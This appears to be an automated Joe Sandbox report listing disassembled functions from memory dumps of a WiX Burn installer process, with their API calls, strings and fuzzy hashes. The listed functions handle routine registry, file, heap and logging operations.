Similarity

API ID: CompareString$lstrlen
String ID:
API String ID: 1657112622-0
Opcode ID: 238683d88b519205b1f1d88d81fb5980f4b90fd0e479278f49f506455ddd04a2
Instruction ID: 2899c40ef0600b7a75c962128c2651d6189c0323829c372ee68f7bc41e95b890
Opcode Fuzzy Hash: 238683d88b519205b1f1d88d81fb5980f4b90fd0e479278f49f506455ddd04a2
Instruction Fuzzy Hash: 13318672600118FFEF118F58CC859AE3F6AFB4A364F154416F909C7910CA71AD91DB71

Function 008A74B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(008A53BD,WixBundleOriginalSource,?,?,008BA623,840F01E8,WixBundleOriginalSource,?,0090AA90,?,00000000,008A5445,00000001,?,?,008A5445), ref: 008A74C3
LeaveCriticalSection.KERNEL32(008A53BD,008A53BD,00000000,00000000,?,?,008BA623,840F01E8,WixBundleOriginalSource,?,0090AA90,?,00000000,008A5445,00000001,?), ref: 008A752A

Strings

Failed to get value of variable: %ls, xrefs: 008A74FD
WixBundleOriginalSource, xrefs: 008A74BF
Failed to get value as string for variable: %ls, xrefs: 008A7519

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
API String ID: 3168844106-30613933
Opcode ID: 6920bac1d91753f1d2a2327d48f6a2dd5a87eb4df912cdcb04bb80698b53eee6
Instruction ID: cd375aa7c9050712ed980fea625aa7865bd93fa2f1e4ba26b8701d03c3905fe7
Opcode Fuzzy Hash: 6920bac1d91753f1d2a2327d48f6a2dd5a87eb4df912cdcb04bb80698b53eee6
Instruction Fuzzy Hash: D3019A72D4416AFBDF229E44CC05A9E3B64FF02365F104160FD04EA620C33A9E51ABD5

Function 008CD152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000,?,008CD148,00000000), ref: 008CD16D
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,008CD148,00000000), ref: 008CD179
CloseHandle.KERNEL32(008EB518,00000000,?,00000000,?,008CD148,00000000), ref: 008CD186
CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,008CD148,00000000), ref: 008CD193
UnmapViewOfFile.KERNEL32(008EB4E8,00000000,?,008CD148,00000000), ref: 008CD1A2

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 74e12959f0c823bc577c31837bd383e82c4a06d70bffe8f82d43957294e60db9
Instruction ID: 59bca41aba4157860804313bcab56725f798a43cd71f0c3da58a8ec0b60ba0c3
Opcode Fuzzy Hash: 74e12959f0c823bc577c31837bd383e82c4a06d70bffe8f82d43957294e60db9
Instruction Fuzzy Hash: B401D272400B269FCB31AF66D880916F7F9FE50711319C93FE2AA92920C371A880CE40

Function 008E8713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 008E8820
GetLastError.KERNEL32 ref: 008E882A

Strings

clbcatq.dll, xrefs: 008E8731, 008E873C
timeutil.cpp, xrefs: 008E884E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Time$ErrorFileLastSystem
String ID: clbcatq.dll$timeutil.cpp
API String ID: 2781989572-961924111
Opcode ID: ddfecc9297ee948d607807cc75af0afc0f2658db869f8f26dae5214a29a8b7ce
Instruction ID: 123cd13e311b5034c790381e7d7c72ffc82a69867543ef2436410463b87724b6
Opcode Fuzzy Hash: ddfecc9297ee948d607807cc75af0afc0f2658db869f8f26dae5214a29a8b7ce
Instruction Fuzzy Hash: 1441C676E002AAE6E7209BB98C45B7F7775FF56700F54452AB905F7290EA35CE0083A1

Function 008E36CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(000002C0), ref: 008E36E6
SysAllocString.OLEAUT32(?), ref: 008E36F6
VariantClear.OLEAUT32(?), ref: 008E37D5

Strings

xmlutil.cpp, xrefs: 008E370E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Variant$AllocClearInitString
String ID: xmlutil.cpp
API String ID: 2213243845-1270936966
Opcode ID: 7f1e7aa8bb306407288930c9068398fa8fbdd14aa1885c519bd2ef01604e9840
Instruction ID: 0a5b4429c8e8d2aaefb61b402749eca0eb12c77d0dd0566f0297c8d2dda9a6bc
Opcode Fuzzy Hash: 7f1e7aa8bb306407288930c9068398fa8fbdd14aa1885c519bd2ef01604e9840
Instruction Fuzzy Hash: 8B4144B5900269ABCB119FA5CC88EABB7A8FF46710F1541B4FC15EB211DA34DE008B91

Function 008E0E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,008C8E1B), ref: 008E0EAA
RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,008C8E1B,00000000), ref: 008E0EC8
RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,008C8E1B,00000000,00000000,00000000), ref: 008E0F1E

Strings

regutil.cpp, xrefs: 008E0EEE

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Enum$InfoQuery
String ID: regutil.cpp
API String ID: 73471667-955085611
Opcode ID: 1f28fa6b74a15beb9500cc6224e5f10aa343fc2eb6a36adac50b9218333b2956
Instruction ID: 551232c45b4c38b02b12d18cd19b2ce88a76833fa2accd4050d8befd775d27e1
Opcode Fuzzy Hash: 1f28fa6b74a15beb9500cc6224e5f10aa343fc2eb6a36adac50b9218333b2956
Instruction Fuzzy Hash: B831B676D0116ABFEB218A868C44DAFB76CFF05750F150865BD00EB250DBB18E509AE0

Function 008C8B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,008C8E57,00000000,00000000), ref: 008C8BD4

Strings

Failed to open uninstall key for potential related bundle: %ls, xrefs: 008C8B43
Failed to initialize package from related bundle id: %ls, xrefs: 008C8BBA
Failed to ensure there is space for related bundles., xrefs: 008C8B87

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
API String ID: 47109696-1717420724
Opcode ID: e66242972d720d535653a7cf4888a52e7ec4a78f946dcc30d39b04bb76af06ea
Instruction ID: d41f07f0211b683214849d0e6f2b0d053ad455239949b4919769468f5cd11a25
Opcode Fuzzy Hash: e66242972d720d535653a7cf4888a52e7ec4a78f946dcc30d39b04bb76af06ea
Instruction Fuzzy Hash: 2A218E7298051AFBDF129A44CC46FAEBB78FB05721F104459F910E6150DB75DE20AB91

Function 008A3B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,80004005,00000000,00000000,00000100,?,008A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008A13B8), ref: 008A3B33
HeapReAlloc.KERNEL32(00000000,?,008A1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,008A13B8,000001C7,00000100,?,80004005,00000000), ref: 008A3B3A

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

Part of subcall function 008A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BDB
Part of subcall function 008A3BD3: HeapSize.KERNEL32(00000000,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BE2

_memcpy_s.LIBCMT ref: 008A3B86

Strings

memutil.cpp, xrefs: 008A3BC7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$Process$AllocAllocateSize_memcpy_s
String ID: memutil.cpp
API String ID: 3406509257-2429405624
Opcode ID: 65d5d6f4cf7b7c1149cf7bdf26dd742e8bc6bab9dccb6163ea9b37388d028851
Instruction ID: a7dd7a810c212d4f3d091bd069ce7a290e5bb9ba7c2365107bd5682e991c7164
Opcode Fuzzy Hash: 65d5d6f4cf7b7c1149cf7bdf26dd742e8bc6bab9dccb6163ea9b37388d028851
Instruction Fuzzy Hash: D311D231504629ABEB226E6CCC48D6F3A5BFB42770B054225F814DB662D735CF1292F1

Function 008E894D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 008E8991
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008E89B9
GetLastError.KERNEL32 ref: 008E89C3

Strings

inetutil.cpp, xrefs: 008E89E4

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastTime$FileSystem
String ID: inetutil.cpp
API String ID: 1528435940-2900720265
Opcode ID: bb2c6604f844d5a98a431855cb9c3e8009edf7ade581ce19a944f7adc63ceab3
Instruction ID: 9f953523c69a85837d33077a381c3524d710ee03bf26ce6812b856877b82a7dd
Opcode Fuzzy Hash: bb2c6604f844d5a98a431855cb9c3e8009edf7ade581ce19a944f7adc63ceab3
Instruction Fuzzy Hash: C011DA33E01529ABD3209AAACD45BBFBFA8FF45750F010125AE44FB141D624DD0086E2

Function 008B3AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,008B3FB5,feclient.dll,?,00000000,?,?,?,008A4B12), ref: 008B3B42

Part of subcall function 008E10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008E112B
Part of subcall function 008E10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008E1163

Strings

feclient.dll, xrefs: 008B3AAB
Logging, xrefs: 008B3AD4
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 008B3AB7

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 0801fb541bd4d3fff06dbcaba053f024d8e9c04d050520994097f1d83900e67d
Instruction ID: 56af7712050814fe934682613f3e7f9fec4c3fd9cb14a45e7f0d8928807e1158
Opcode Fuzzy Hash: 0801fb541bd4d3fff06dbcaba053f024d8e9c04d050520994097f1d83900e67d
Instruction Fuzzy Hash: DD119336B40608BBDB21DA99DC86EFFBBB8FB11720F900065E600EB295D6719F81D750

Function 008E0764 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(008C12CF,00000000,00000000,?,?,?,008E0013,008C12CF,008C12CF,?,00000000,0000FDE9,?,008C12CF,8007139F,Invalid operation for this state.), ref: 008E0776
WriteFile.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,?,?,008E0013,008C12CF,008C12CF,?,00000000,0000FDE9,?,008C12CF,8007139F), ref: 008E07B2
GetLastError.KERNEL32(?,?,008E0013,008C12CF,008C12CF,?,00000000,0000FDE9,?,008C12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 008E07BC

Strings

logutil.cpp, xrefs: 008E07ED

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: logutil.cpp
API String ID: 606256338-3545173039
Opcode ID: 82d1266f491926bad4060262f86e00ac5227dc6cca2f46b85817283484c134ac
Instruction ID: 4c9ddcb2cffaa88af44eeaa9ddffa091ead7bb9465dad7daca32c92d3f36f91f
Opcode Fuzzy Hash: 82d1266f491926bad4060262f86e00ac5227dc6cca2f46b85817283484c134ac
Instruction Fuzzy Hash: C511CD72904269ABC3108A6B8C849AF7A6CFB46760B014624FD00D7240D771ED40CDE0

Function 008A120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,008A523F,00000000,?), ref: 008A1248
GetLastError.KERNEL32(?,?,?,008A523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 008A1252

Strings

ignored , xrefs: 008A1217
apputil.cpp, xrefs: 008A1273

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ArgvCommandErrorLastLine
String ID: apputil.cpp$ignored
API String ID: 3459693003-568828354
Opcode ID: 26e5832cf383d933e650928ef7d4593f61a31f55ecef52cefe870614de0bec92
Instruction ID: a53a94bf8bf4376def851f896ac8037ce9b309add01785af3d0f3a36c68f2795
Opcode Fuzzy Hash: 26e5832cf383d933e650928ef7d4593f61a31f55ecef52cefe870614de0bec92
Instruction Fuzzy Hash: 0F116D76901629AB9F21DBD9C809E9FBBA8FF46750F010155FD04EB610E730DE009AA0

Function 008CD1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,008CD3EE,00000000,00000000,00000000,?), ref: 008CD1C3
ReleaseMutex.KERNEL32(?,?,008CD3EE,00000000,00000000,00000000,?), ref: 008CD24A

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

Strings

NetFxChainer.cpp, xrefs: 008CD208
Failed to allocate memory for message data, xrefs: 008CD212

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: bdc251b2f1f044f21b5bab7332f147c7cca2da116f0ca1ce602d5d5111ebfa7f
Instruction ID: e9da39979b237c22b904aa436af327358fcfd4c322a2664231b1ee7caa217bda
Opcode Fuzzy Hash: bdc251b2f1f044f21b5bab7332f147c7cca2da116f0ca1ce602d5d5111ebfa7f
Instruction Fuzzy Hash: 8811BFB1200215EFDB059F68D881E5ABBF5FF49724F104179F9149B3A1C771E810CB94

Function 008A1F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(008A428F,008A548E,?,00000000,00000000,00000000,?,80070656,?,?,?,008BE75C,00000000,008A548E,00000000,80070656), ref: 008A1F9A
GetLastError.KERNEL32(?,?,?,008BE75C,00000000,008A548E,00000000,80070656,?,?,008B40BF,008A548E,?,80070656,00000001,crypt32.dll), ref: 008A1FA7
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,008BE75C,00000000,008A548E,00000000,80070656,?,?,008B40BF,008A548E), ref: 008A1FEE

Strings

strutil.cpp, xrefs: 008A1FCB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: d3dd4e0e329e1493e09ee24b3edda3941652ae19af3774be109e16cc19edac03
Instruction ID: a192a06edf7fffcdf0f31561317911d7d4e62928b00fc75eefd52ee0c08054ff
Opcode Fuzzy Hash: d3dd4e0e329e1493e09ee24b3edda3941652ae19af3774be109e16cc19edac03
Instruction Fuzzy Hash: 6B016DB691112ABFEB208FD5CC09ADFBAACFB05750F114165BD14FB650EB749E009AE0

Function 008B0721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 008B0791

Strings

Failed to update resume mode., xrefs: 008B0762
Failed to open registration key., xrefs: 008B0748
Failed to update name and publisher., xrefs: 008B077B

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
API String ID: 47109696-1865096027
Opcode ID: 2d5afa1ed5c36b755175e0182dc618885d449dda6c0c661f2160af0e10fe9a6f
Instruction ID: 44b23a97ea482ef25948355fb17931bfa941b3d170f16a9bd0579c87f547a27b
Opcode Fuzzy Hash: 2d5afa1ed5c36b755175e0182dc618885d449dda6c0c661f2160af0e10fe9a6f
Instruction Fuzzy Hash: D501B532A40229F7CB125695DC45BEFBA69FB11B20F100151F600F6351CB76BE10AFD5

Function 008E4DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(008EB500,40000000,00000001,00000000,00000002,00000080,00000000,008B04BF,00000000,?,008AF4F4,?,00000080,008EB500,00000000), ref: 008E4DCB
GetLastError.KERNEL32(?,008AF4F4,?,00000080,008EB500,00000000,?,008B04BF,?,00000094,?,?,?,?,?,00000000), ref: 008E4DD8
CloseHandle.KERNEL32(00000000,00000000,?,008AF4F4,?,008AF4F4,?,00000080,008EB500,00000000,?,008B04BF,?,00000094), ref: 008E4E2C

Strings

fileutil.cpp, xrefs: 008E4DFC

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: 6dd59b86114040b6f85e5e42ee23e458c46cf2bd92012430dadbabfec3c03843
Instruction ID: 8d260255dbac72900ad9828b97e134faf5e05ece2514dc0f4134e3706a51166d
Opcode Fuzzy Hash: 6dd59b86114040b6f85e5e42ee23e458c46cf2bd92012430dadbabfec3c03843
Instruction Fuzzy Hash: 5B01D433641566ABD7325A6A9C05F5F3A54FB82B70F015310FF28EB1E0D7709C1192E1

Function 008E497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,008C8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 008E49AE
GetLastError.KERNEL32(?,008C8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,userVersion,000002C0,000000B0), ref: 008E49BB

Strings

fileutil.cpp, xrefs: 008E498F, 008E49DF

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
